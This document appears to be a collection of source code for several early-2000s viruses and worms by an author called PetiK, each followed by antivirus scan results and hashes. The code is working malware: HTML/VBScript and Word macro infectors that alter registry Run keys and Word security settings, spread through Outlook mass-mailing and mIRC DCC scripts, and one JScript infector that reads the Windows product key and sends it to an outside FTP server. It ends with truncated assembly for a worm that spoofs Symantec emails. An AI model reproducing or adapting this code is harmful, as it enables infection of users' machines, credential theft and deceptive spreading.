File Mustard.exe received on 05.16.2009 17:59:52 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 Result VBS.Lee.Based!IK Worm/Petik.18 Worm/Win32.Win32 W32/Malware!989a Win32:Petik-Mustard I-Worm/Petik.U Win32.Mustar.A@mm W32.Petik.D Worm.Petik.d Worm.Win32.Petik.D Win32.Petik.7168 Win32/Petik.7168.A W32/Malware!989a Email-Worm.Win32.Petik W32/PetTick.U@mm Win32.Mustar.A@mm VBS.Lee.Based Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.18 Worm:Win32/Petik.D@mm Win32/Petik.D W32/Pet_Tick.7168 W32/Petik.D Worm.Petik Medium Risk Malware Worm.Mail.Petik.y W32/Petik-D Worm.Petik W95.Pet_Tick.gen W32/PetTick@MM WORM_PET.TICK.U Win32.Worm.Petik.8192 -

Additional information
File size: 7168 bytes
MD5...: 2aae09e21d35fd56f7aa0f603dcb6151
SHA1..: 4fbe3b2758bdb50ea45bb4593f074239c30bdd5d

<!--
Name : HTML.Embargo
Author : PetiK
Language : HTML/VBS

Copies itself into %WINDIR%\WinHelp.htm
Modifies AUTOEXEC.BAT to display a message
Sets the Internet Explorer start page to the WinHelp.htm file
Forces Internet Explorer into full-screen mode
Spreads with mIRC
Infects all HTM and HTML files in %WINDIR%\Web\Wallpaper
If the day is the 5th or the 17th, it runs "cdplayer.exe", "notepad.exe", etc.

--> <embargo> <HTML><HEAD><TITLE>WinHelp</TITLE></HEAD> <BODY bgColor=#ffffff> <SCRIPT Language=VBScript> On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set original=document.body.createTextRange Set copie=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\WinHelp.htm") copie.WriteLine "<embargo>" copie.WriteLine "<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>" copie.WriteLine "<BODY bgColor=#ffffff>" copie.WriteLine original.htmltext copie.WriteLine "</BODY></HTML>" copie.Close() reg=ws.RegRead("HKLM\Software\HTML.Embargo\") If reg <> "c parti" Then Set auto=fso.OpenTextFile("C:\autoexec.bat", 1, False, False) tout=auto.ReadAll Set nouveau= fso.CreateTextFile("C:\autoexec.bat", True, False) nouveau.Write(tout) nouveau.WriteLine "" nouveau.WriteLine "@echo off" nouveau.WriteLine ":embargo" nouveau.WriteLine "cls" nouveau.WriteLine "echo This is the signature of my new virus" nouveau.WriteLine "echo." nouveau.WriteLine "echo HTML.Embargo by PetiK" nouveau.WriteLine "echo Made In France (c)2001" nouveau.WriteLine "pause" nouveau.WriteLine "goto embargo" nouveau.Close() ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",fso.GetSpecialFolder(0)&"\WinHelp.htm" ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\FullScreen","yes" ws.RegWrite "HKLM\Software\HTML.Embargo\","c parti" End If reg=ws.RegRead("HKLM\Software\HTML.Embargo\mirc") If reg <> "c parti" Then PFD=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") If dossier = "" Then If fso.FileExists("c:\mirc\mirc.ini") Then dossier = "c:\mirc" If fso.FileExists("c:\mirc32\mirc.ini") Then dossier = "c:\mirc32" If fso.FileExists(PFD & "\mirc\mirc.ini") Then dossier = PFD & "\mirc" If fso.FileExists(PFD & "\mirc32\mirc.ini") Then dossier = PFD & "\mirc32" End If If dossier <> "" Then Set script = fso.CreateTextFile(dossier & "\script.ini", True) script.WriteLine "[script]" script.WriteLine "n0=on 1:JOIN:#:{" 
script.WriteLine "n1= /if ( $nick == &me ) (halt)" script.WriteLine "n2= ./dcc send $nick " & fso.GetSpecialFolder(0)&"\WinHelp.htm" script.WriteLine "n3=}" ws.RegWrite "HKLM\Software\HTML.Embargo\mirc","c parti" End If Set FolderObj = fso.GetFolder(fso.GetSpecialFolder(0)&"\WEB\WallPaper") Set FO = FolderObj.Files For Each cible in FO

ext = lcase(fso.GetExtensionName(cible.Name)) If ext = "htm" or ext = "html" Then Set vrai = fso.OpenTextFile(cible.path, 1, false) If vrai.readline <> "<embargo>" Then vrai.Close() Set vrai = fso.OpenTextFile(cible.path, 1, false) htmorg = vrai.ReadAll() vrai.Close() Set virus = document.body.createTextRange Set vrai = fso.CreateTextFile(cible.path, True, False) vrai.WriteLine(htmorg) vrai.WriteLine "" vrai.WriteLine virus.htmltext vrai.Close() Else vrai.Close() End If End If Next End If If Day(Now()) = 5 or Day(Now)) = 17 Then ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\CDPlayer",fso.GetSpecialFolder(0)&"\C dplayer.exe" ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NotePad",fso.GetSpecialFolder(0)&"\No tepad.exe" ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PaintBrush",fso.GetSpecialFolder(0)&" \Pbrush.exe" ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer",fso.GetSpecialFolder(0)&"\E xplorer.exe" ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\RegEdit",fso.GetSpecialFolder(0)&"\Re gedit.exe" ws.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut","60" ws.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveUsePassword", 01, "REG_DWORD" document.Write "<font face='verdana' color=blue size='2'>Microsoft Internet Explorer<br>Please enabled ActiveX to see this page<br></font>" </SCRIPT> </BODY></HTML>

File Embargo.htm received on 05.16.2009 11:30:48 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result VBS.Embargo!IK HTML/Petik Worm/Petik.J Worm/Win32.Petik VBS/Embargo.A BV:KillAll VBS/Bother VBS.Embargo.A VBS.Petik.J Unclassified Malware VBS.Generic.262 Email-Win32.Petik.j VBS/Both VBS/Embargo.A Email-Worm.Win32.Petik.j VBS/Petik.J!worm VBS.Embargo.A VBS.Embargo Email-Worm.Win32.Petik.j VBS/Ergo.intd VBS/Ergo.intd Worm.Petik.J Virus:VBS/Petik.J VBS/Petik.J mIRC/Gen_HTM VBS.Embargo.A HTML/Embargo VBS.Embargo.A VBS.Petik.j VBS/Ergo-A VBS.Embaro.A.Intd Email-Worm.Win32.Petik.j VBS.Embargo.A

Additional information
File size: 4085 bytes
MD5...: 4ec0004fb7f700df736ae4d3c2c22919
SHA1..: 464dec7db3865638af142f5e8929fcd49e5af667


Worm Name : W97M.Maya.A
Author : PetiK
Language : VBA Word
Date : May 29th – June 1st 2001
Size : 33792 – 33280 (with change) bytes

Changes the properties of the document. If the value "W97M.Maya" does not exist in the key HKLM\Software\, the worm copies itself to C:\Windows\Maya.doc. It creates the "C:\Maya" directory with a TXT file and a script file to infect mIRC channels. After that, it spreads with Microsoft Outlook.
Subject : "Hi man, it's " + user name
Body : "This is the new net Story" / "It's great"
Attachment : Maya.doc
On the 5th of the month, when the document is closed, a message box appears. When the Visual Basic editor is opened, another message box appears and the worm adds a value to the Run key of the registry to disable the mouse.

Sub AutoOpen() On Error Resume Next With Dialogs(wdDialogFileSummaryInfo) .Author = "PetiK" .Title = "W97M.Maya" .Comments = "To my best GirlFriend" .Keywords = "Maya, Bzzbzz, to grow" .Execute End With If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") <> "Par PetiK" Then ActiveDocument.SaveAs FileName:="C:\Windows\Maya.doc" ActiveDocument.Saved = True FileSystem.MkDir "C:\Maya" Open "C:\Maya\hello.txt" For Output As #1 Print #1, "Le 29 mai 2001 à Munster" Print #1, "This is my first W97M.Outlook.Worm" Print #1, "Its name is W97M.Maya" Close #1 Open "C:\Maya\script.ini" For Output As #1 Print #1, "n0=on 1:JOIN:#:{" Print #1, "n1= /if ( $nick == $me ) { halt }" Print #1, "n2= /.dcc send $nick C:\Windows\Maya.doc" Print #1, "n3=}" Close #1 FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc\script.ini" FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc32\script.ini" FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc\script.ini" FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc32\script.ini" FileSystem.Kill "C:\Maya\script.ini" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") = "Par PetiK" End If Dim maya, bzzbzz, petik Set maya = CreateObject("Outlook.Application") Set bzzbzz = maya.GetNameSpace("MAPI") If maya = "Outlook" Then bzzbzz.Logon "profile", "password" For mayacompte = 1 To bzzbzz.AddressLists.Count Set AB = bzzbzz.AddressLists(mayacompte) x = 1 Set petik = maya.CreateItem(0) For compte = 1 To AB.AddressEntries.Count verif = AB.AddressEntries(x) petik.Recipients.Add verif x = x + 1 If x > 500 Then compte = AB.AddressEntries.Count Next compte petik.Subject = "Hi man, it's " & Application.UserName petik.Body = "This is the new net Story" + vbCrLf + "It's great" petik.Attachments.Add ActiveDocument.FullName

petik.DeleteAfterSubmit = True petik.Send verif = "" Next mayacompte bzzbzz.Logoff End If End Sub Sub AutoClose() If Day(Now) = 5 Then MsgBox "Coded by PetiK (c)2001", vbInformation, "W97M.Maya" End If End Sub Sub ViewVBCode() System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MayAttack") = "rundll32 mouse,disable" MsgBox "Curiosity is bad" + vbCr + vbCr + "With her small size" + vbCr + "Maya is alwayas there", vbCritical, "W97M.Maya" ShowVisualBasicEditor = True End Sub

File Maya.doc received Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

on 05.16.2009 17:59:46 (CET) Version Last Update 4.0.0.101 2009.05.16 5.0.0.2 2009.05.16 7.9.0.168 2009.05.15 2.0.3.1 2009.05.15 5.1.2.4 2009.05.16 4.8.1335.0 2009.05.15 8.5.0.336 2009.05.15 7.2 2009.05.16 10.00 2009.05.15 0.94.1 2009.05.16 1157 2009.05.08 5.0.0.12182 2009.05.16 7.0.17.0 2009.05.14 31.6.6508 2009.05.16 4.4.4.56 2009.05.16 8.0.14470.0 2009.05.15 3.117.0.0 2009.05.16 19 2009.05.16 T3.1.1.49.0 2009.05.16 7.10.737 2009.05.16 7.0.0.125 2009.05.16 5616 2009.05.15 5616 2009.05.15 6.7.6 2009.05.15 1.4602 2009.05.16 4080 2009.05.15 6.01.05 2009.05.16 2009.1.8.0 2009.05.16 10.0.0.14 2009.05.16 4.4.2.0 2009.05.16 3.0 2009.05.16 21.29.52.00 2009.05.16 4.41.0 2009.05.16 3.2.1858.2 2009.05.16 1.4.4.12 2009.05.16 6.3.4.1.326 2009.05.15 8.950.0.1092 2009.05.15 3.12.10.5 2009.05.16 2009.5.15.1737 2009.05.15 4.6.5.0 2009.05.16

Result Virus.MSWord.Melissa-based!IK W97M/Unnamed W2000M/Ayam.A@mm Virus/MSWord.MSWord W97M/Ayam.A@mm MW97:Ayam family BAT/Generic W97M.Ayam.A@mm W97M.Prilissa W97M.Ayam.A Virus.MSWord.Melissabased X97M.Papa O97M.GNsm W97M/Ayam.A:mm W97M/Ayam.A@mm Virus.MSWord.Melissa-based W97M/Ayam.A@MM W97M.Ayam.A@mm Virus.MSWord.Melissa-based Macro.Melissa-based Virus.MSWord.Melissa-based W97M/Generic@MM W97M/Generic@MM Macro.Ayam.A Virus:W97M/Ayam.A@mm W97M/Ayam.A W97M/Ayam.A W97M.Ayam.A@mm W97M/Maya.Worm WORD.97.Maya.B Macro.Office.Melissa-based.aa WM97/Munster-A Virus.MSWord.Melissa-based (v) W97M.OutlookWorm.Gen W2KM/Sin W97M_AYAM.A Virus.X97M.Papa W97M.Ayam.A WORD.97.Maya.B

Additional information
File size: 33280 bytes
MD5...: ebe499343061e49ea4f31639fc3a7e59
SHA1..: 89de7abdbdc3fc8764d481a49125b8a3cebf6f05


Name : JS.Germinal.A@mm
Author : PetiK
Date : June 1st – 2nd 2001
Language : JScript
Size of infection : 2357 bytes
Action : It infects all *.JS files in the \WINDOWS, \WINDOWS\DESKTOP and \WINDOWS\SAMPLES\WSH folders. It creates a TXT file with system information and sends it to an FTP server.

// JS.Germinal.A@mm var WS=WScript.CreateObject("WScript.Shell") var fso=WScript.CreateObject("Scripting.FileSystemObject") var win=fso.GetSpecialFolder(0) var c=fso.OpenTextFile(WScript.ScriptFullName,1) var virus=c.ReadAll() var dossier=new Array() dossier[0]=fso.GetFolder(".") dossier[1]=win dossier[2]=win + "\\Desktop" dossier[3]=win + "\\SAMPLES\\WSH" for(i=0;i<4;i++){ infecte(dossier[i]) } function infecte(dossier) { var notredossier=fso.GetFolder(dossier) var fichier=new Enumerator(notredossier.Files) if(fso.GetExtensionName(fichier.item()).toUpperCase()=="JS") { var victime=fso.OpenTextFile(fichier.item().path,1) var marque=victime.Read(19) var victimecode=marque+victime.ReadAll() victime.Close() if(marque!="// JS.Germinal.A@mm") { var victime=fso.CreateTextFile(fichier.item().path,2) victime.Write(virus+victimecode) victime.Close() } } } WS.RegWrite ("HKLM\\Software\\","JS.Germinal Par PetiK 02/05/2001"); WS.RegWrite ("HKCU\\Software\\","JS.Germinal Par PetiK 02/05/2001"); var nom=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOwner") var org=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RegisteredOrganization") var id=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductId") var key=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ProductKey") var ver=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Version") var vernum=WS.RegRead ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\VersionNumber") var txt=fso.CreateTextFile("C:\\"+nom+".txt",2) txt.WriteLine ("Information de " + nom + " à " + org); txt.WriteLine (""); txt.WriteLine ("Numéro d'identification : " + id); txt.WriteLine ("Numéro de la clé : " + key); txt.WriteLine ("Version de windows : " + ver + " " + vernum); txt.Close() var drv=fso.CreateTextFile(win+"\\PetiK.drv",2) drv.WriteLine ("open"); drv.WriteLine ("members.aol.com"); drv.WriteLine ("pentasm99"); drv.WriteLine ("ascii") drv.WriteLine 
("put C:\\"+nom+".txt"); drv.WriteLine ("bye"); drv.WriteLine ("exit"); drv.Close() WS.Run ("command.com /c ftp.exe -i -v -s:"+win+"\\PetiK.drv") // Par PetiK 2nd June 2001

File Germinal.js received on 05.16.2009 11:58:21 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Virus.JS.Germinal!IK JS/Germinal JSC/Germinal.1 Virus/JS.JS JS/Germinal.A Unix:Malware-gen JS.Germinal.A JS_/Germinal JS.Germinal JS.Optiz JS/Germin JS/Germinal.A Virus.JS.Germinal JS/GERMINAL.A JS.Germinal.A Virus.JS.Germinal Virus.JS.Germinal JS/Germinal JS/Germinal Script.Germinal.1 Trojan:JS/Germinal.A JS/Germinal.A JS/Germinal.B JS.Germinal.A JS.Germinal.A Script.Germinal.Trojan JS/Germinal Virus.JS.Germinal (v) JS.Lamnireg.A.Trojan JS_GERMINAL.A Virus.JS.Germinal JS.Germinal.A

Additional information
File size: 2357 bytes
MD5...: b90254895d6169a8d111a508e2638c51
SHA1..: 7669c66d338b4208536c32924bcab95996cf8c3e


Name : W97M.Kodak
Author : PetiK
Date : June 5th 2001
Size : 3,030 bytes

Macro AutoOpen : Creates a "script.ini" file for mIRC. If the day is the 5th, the virus displays a balloon message. It copies itself to /Windows/Kodak.doc.
Macro AutoClose : It alters the security settings of Word 9.0 and 10.0 (2000 and XP). It copies its code into the file "Kodak.vxd" and imports it into "NORMAL.DOT". When a new file is created, the macro code is written into that file. To avoid infecting "NORMAL.DOT" twice, the virus adds the value HKEY_LOCAL_MACHINE\Software\Microsoft\W97M.Kodak = CliClac.
Macro HelpAbout : Displays another balloon message.
Macro ViewVBCode : Displays a message box and shows the Visual Basic Editor.
Macros ToolsOptions and ToolsSecurity : Find out for yourself.

'W97M.Kodak by PetiK 05/10/2001 Sub AutoOpen() On Error Resume Next ActiveDocument.SaveAs FileName:="C:\Windows\Kodak.doc" ActiveDocument.Saved = True Open "C:\script.drv" For Output As #1 Print #1, "n0=on 1:JOIN:#:{" Print #1, "n1= /if ( $nick == $me ) { halt }" Print #1, "n2= /.dcc send $nick C:\Windows\Kodak.doc" Print #1, "n3=}" Close #1 FileSystem.FileCopy "C:\script.drv", "C:\mirc\script.ini" FileSystem.FileCopy "C:\script.drv", "C:\mirc32\script.ini" FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc\script.ini" FileSystem.FileCopy "C:\script.drv", "C:\progra~1\mirc32\script.ini" FileSystem.Kill "C:\script.drv" If Day(Now) = 5 Then With Application.Assistant .Visible = True End With With Assistant.NewBalloon .Text = "I am always here. And you, are you here." .Heading = "W97M.Kodak" .Animation = msoAnimationGetAttentionMajor .Button = msoButtonSetOK .Show End With End If End Sub Sub AutoClose() If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> 1& Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End If If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> 1& Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& End If If Dir("C:\Kodak.vxd", vbReadOnly) = "" Then Open "C:\Kodak.vxd" For Output As #1 For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines K = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1) Print #1, K Next i Close #1 SetAttr "C:\Kodak.vxd", vbReadOnly End If If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") <> "ClicClac" Then NormalTemplate.VBProject.VBComponents.Import "C:\Kodak.vxd" NormalTemplate.Save System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\", "W97M.Kodak") = "ClicClac" End 
If

ActiveDocument.VBProject.VBComponents.Import "C:\Kodak.vxd" ActiveDocument.Save End Sub Sub HelpAbout() With Application.Assistant .Visible = True End With With Assistant.NewBalloon .Text = "Smile and cheese for the photo" .Heading = "W97M.Kodak" .Animation = msoAnimationGetAttentionMajor .Button = msoButtonSetOK .Show End With End Sub Sub ViewVBCode() MsgBox "was coded by PetiK(c)2001", vbInformation, "W97M.Kodak" ShowVisualBasicEditor = True End Sub Sub ToolsOptions() On Error Resume Next Options.VirusProtection = 1 Options.SaveNormalPrompt = 1 Dialogs(wdDialogToolsOptions).Show Options.VirusProtection = 0 Options.SaveNormalPrompt = 0 End Sub Sub ToolsSecurity() On Error Resume Next CommandBars("Macro").Controls("Security...").Enabled = True Dialogs(wdDialogToolsSecurity).Show CommandBars("Macro").Controls("Security...").Enabled = False End Sub

File Kodak.doc received on 05.16.2009 17:43:05 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Adok!IK
AhnLab-V3 5.0.0.2 2009.05.16 W97M/Adok
AntiVir 7.9.0.168 2009.05.15 W2000M/Petman.A
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.16 W97M/Adok.A
Avast 4.8.1335.0 2009.05.15 MW97:Adok-A
AVG 8.5.0.336 2009.05.15 W97M/Ethan
BitDefender 7.2 2009.05.16 W97M.Kdk.A
CAT-QuickHeal 10.00 2009.05.15 W97M.ZMK.M
ClamAV 0.94.1 2009.05.16 WM.Psycho
Comodo 1157 2009.05.08 Virus.MSWord.Adok
DrWeb 5.0.0.12182 2009.05.16 W97M.Petik
eSafe 7.0.17.0 2009.05.14 O97M.GNcc
eTrust-Vet 31.6.6508 2009.05.16 W97M/Adok.A
F-Prot 4.4.4.56 2009.05.16 W97M/Adok.A
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Adok
Fortinet 3.117.0.0 2009.05.16 W97M/Adok.A
GData 19 2009.05.16 W97M.Kdk.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Adok
K7AntiVirus 7.10.737 2009.05.16 Macro.Adok
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Adok
McAfee 5616 2009.05.15 W97M/Generic
McAfee+Artemis 5616 2009.05.15 W97M/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Macro.Petman.A
Microsoft 1.4602 2009.05.16 Virus:W97M/Adok.A
NOD32 4080 2009.05.15 W97M/Adok.A
Norman 6.01.05 2009.05.16 W97M/Adok.A
nProtect 2009.1.8.0 2009.05.16 W97M.Kdk.A
Panda 10.0.0.14 2009.05.16 W97M/Kodak.worm
PCTools 4.4.2.0 2009.05.16 WORD.97.Adok.A
Prevx 3.0 2009.05.16
Rising 21.29.52.00 2009.05.16 Macro.Word97.Adok
Sophos 4.41.0 2009.05.16 WM97/Adok-A
Sunbelt 3.2.1858.2 2009.05.16 W97M.Adok (v)
Symantec 1.4.4.12 2009.05.16 W97M.Adok.A
TheHacker 6.3.4.1.326 2009.05.15 W2KM/Generico
TrendMicro 8.950.0.1092 2009.05.15 W97M_ABOTUS.A
VBA32 3.12.10.5 2009.05.16 Virus.W97M.Ethan
ViRobot 2009.5.15.1737 2009.05.15 W97M.Adok
VirusBuster 4.6.5.0 2009.05.16 WORD.97.Adok.A

Additional information
File size: 31232 bytes
MD5...: 84a74bcf024ac4779d20e2b667bc6da6
SHA1..: 99cbae9ae51381d5f7eb637b12d42e790f48db33

comment #
Name : I-Worm.Gamma (w32gammaworm)
Author : PetiK
Date : May 29th - June 9th
Size : 8704 bytes
Action : Checks whether the running file is /WINDOWS/SYSTEM/SETUP.EXE. If it is not, it copies itself to /WINDOWS/SYSTEM/SETUP.EXE, alters the run= line in the WIN.INI file to the name of the copy and displays a message. Otherwise, it creates C:\gamma and copies it to C:\mirc, C:\mirc32, C:\progra~1\mirc or C:\progra~1\mirc32. Then it creates C:\Data and puts a file info.vbs there. This file sends a message to gamma@multimania.com :
Subject : Message from + name of the registered user
Body : Time, Date, Organization, I-Worm.Gamma
On the 5th, when the day is a Wednesday, a message is displayed. When the user clicks "OK", the worm swaps the buttons of the mouse. The worm waits for an active Internet connection and tries to establish one by attempting to reach www.symantec.com. When the connection succeeds, it scans all *.*htm* files in "Temporary Internet Files" to find e-mail addresses. For each address it finds, it sends a copy of itself :
From : snd@symantec.com
Date : 06/06/2001
Subject : Virus/Worms Fix from Symantec Corporation (Norton Antivirus)
Body : Hi, Symantec Corporation send you the last version of our tool Virus/Worms Fix. Here is the version 3.1 . This tool detect, repair and protect users against Bloodhound.IRC.Worm, Bloodhound.VBS.Worm, Bloodhound.W32 and Bloodhound.WordMacro .
With Regards, Symantec Corporation (http://www.symantec.com) Attachment : SETUP.EXE # .586p .model flat,stdcall include useful.inc extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn CloseHandle:PROC CopyFileA:PROC CreateDirectoryA:PROC CreateFileA:PROC CreateFileMappingA:PROC DeleteFileA:PROC ExitProcess:PROC FindClose:PROC FindFirstFileA:PROC FindNextFileA:PROC gethostbyname:PROC GetFileSize:PROC GetModuleFileNameA:PROC GetModuleHandleA:PROC GetSystemDirectoryA:PROC GetSystemTime:PROC GetWindowsDirectoryA:PROC lstrcat:PROC lstrcmp:PROC MAPILogoff:PROC MAPILogon:PROC MAPISendMail:PROC MapViewOfFile:PROC MessageBoxA:PROC RegCloseKey:PROC RegOpenKeyExA:PROC RegQueryValueExA:PROC SetCurrentDirectoryA:PROC Sleep:PROC SwapMouseButton:PROC UnmapViewOfFile:PROC WinExec:PROC WriteFile:PROC

extrn WritePrivateProfileStringA:PROC .data szComName szOrig szWinini szTif FileHandle RegHandle SrchHandle octets ValueType mail_address MAPISession

db db db db dd dd dd dd dd db dd

50 dup (0) 50 dup (0) 50 dup (0) 7Fh dup (0) ? ? ? ? 0 128 dup (?) 0

